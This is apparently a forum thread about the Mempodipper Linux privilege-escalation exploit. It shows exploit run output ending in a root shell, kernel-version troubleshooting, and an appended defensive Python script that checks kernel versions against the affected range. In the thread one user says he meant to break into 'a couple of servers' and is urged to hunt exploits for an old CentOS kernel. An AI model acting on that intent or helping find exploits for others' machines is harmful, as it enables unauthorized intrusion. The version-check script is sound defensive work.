• Are there working exploits?
  • @zamotivator,
    xl0@bzz:~$ ./a.out
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/12721/mem in child.
    [+] Sending fd 3 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x401fa8.
    [+] Calculating su padding.
    [+] Seeking to offset 0x401f9c.
    [+] Executing su with shellcode.
    # whoami
    root
    #
  • @xl0, son of a bitch. Give me the sources, I'm checking it on my box
  • @zamotivator, First link in zx2c4's post.
  • @xl0, doesn't work

    oleg.tsarev (0) ~$ sudo chown root:root ./a.out
    oleg.tsarev (0) ~$ ./a.out
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/19045/mem in child.
    [+] Sending fd 3 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x1e88.
    [+] Calculating su padding.
    [+] Seeking to offset 0x1e7f.
    [+] Executing su with shellcode.
    oleg.tsarev (0) ~$ whoami
    oleg.tsarev
    oleg.tsarev (0) ~$ ls -al | grep a.out
    -rwxrwxr-x. 1 root root 12803 Jan 23 20:49 a.out
    oleg.tsarev (0) ~$
  • @zamotivator, Update your kernel. ;)
  • @xl0, What, too old?

    oleg.tsarev (0) ~$ cat /etc/issue
    RFRemix release 14.1 (Laughlin)
    Kernel \r on an \m (\l)

    oleg.tsarev (0) ~$ uname -a
    Linux tsarev.t510 2.6.35.14-106.fc14.x86_64 #1 SMP Wed Nov 23 13:07:52 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
    oleg.tsarev (0) ~$
  • @zamotivator, You need 39, after all.
  • @xl0, then it's no fun. I was just about to fuck a couple of servers, and no luck
  • @zamotivator, Everything's "fuck" with you, here, take a cable!
  • @xl0, well fuck living like this then, you don't even get to screw anything

    [oleg.tsarev@*** ~]$ uname -a
    Linux *** 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:49:19 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
  • @zamotivator, Go lurk around; if it was built in 2008, there are bound to be exploits for it.
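A defender's companion to the version back-and-forth above: the thread says Mempodipper needs kernel 2.6.39 or newer, and both `uname -a` lines quoted in it are older than that. The script below is an added example, not code from the thread or from zx2c4. It pulls the release field out of `uname -a` (or `uname -r`) output, turns it into a comparable version tuple, and reports whether a host is below the 2.6.39 floor the thread gives, at or above a fixed-in version you supply from your distro's advisory (the `fixed_in` parameter is deliberately left to the caller; the page does not state it), or in between and in need of a look at the advisory. The two Fedora 14 and CentOS 5 lines are taken from the thread; the third sample line is constructed for the test. Because distributions backport fixes without bumping the upstream version, a version-only check is a first screen, not a verdict.

```python
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Floor stated in the thread: Mempodipper needs 2.6.39 or later.
MIN_AFFECTED: Version = (2, 6, 39)

# Two `uname -a` lines quoted in the thread above, reused here as sample input.
SAMPLE_FEDORA = ("Linux tsarev.t510 2.6.35.14-106.fc14.x86_64 #1 SMP "
                 "Wed Nov 23 13:07:52 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux")
SAMPLE_CENTOS = ("Linux *** 2.6.18-92.1.22.el5.centos.plus #1 SMP "
                 "Wed Dec 17 10:49:19 EST 2008 x86_64 x86_64 x86_64 GNU/Linux")
# Constructed line (not from the thread) for a kernel inside the affected range.
SAMPLE_CONSTRUCTED = ("Linux example-host 3.0.0-12-generic #20 SMP "
                      "Fri Oct 7 14:56:25 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux")


def kernel_release(uname_output: str) -> str:
    """Return the release field of `uname -a` output, or the whole token for `uname -r`."""
    fields = uname_output.split()
    if not fields:
        raise ValueError("empty uname output")
    # `uname -a` prints "<sysname> <nodename> <release> <version> ..."; the release is field 3.
    if len(fields) >= 3 and fields[0] == "Linux":
        return fields[2]
    return fields[0]


def parse_version(release: str) -> Version:
    """Turn '2.6.35.14-106.fc14.x86_64' into (2, 6, 35); a missing patch level counts as 0."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def classify(uname_output: str, fixed_in: Optional[Version] = None) -> str:
    """Place a kernel relative to the range Mempodipper needs.

    Returns one of:
      "below-range"    - older than 2.6.39, the floor the thread states
      "fixed"          - at or above the caller-supplied fixed-in version
      "check-advisory" - inside the range by version number; consult the distro
                         advisory, since backported fixes do not change uname
    """
    version = parse_version(kernel_release(uname_output))
    if version < MIN_AFFECTED:
        return "below-range"
    if fixed_in is not None and version >= fixed_in:
        return "fixed"
    return "check-advisory"


if __name__ == "__main__":
    samples = [("fedora14", SAMPLE_FEDORA), ("centos5", SAMPLE_CENTOS),
               ("constructed", SAMPLE_CONSTRUCTED)]
    try:
        live = subprocess.run(["uname", "-a"], capture_output=True, text=True, check=True).stdout
        samples.append(("this host", live))
    except (OSError, subprocess.CalledProcessError):
        pass  # no uname available (e.g. non-Unix host); sample lines still run
    for label, line in samples:
        print(f"{label:12s} {kernel_release(line):40s} {classify(line)}")
```

Run it as-is to see the three sample lines (and the current host, where `uname` exists) classified; pass `fixed_in=(major, minor, patch)` from your vendor's advisory to get a "fixed" answer for patched kernels. Anything reported as "check-advisory" still needs the package changelog or advisory consulted, because a backported fix leaves the upstream version untouched.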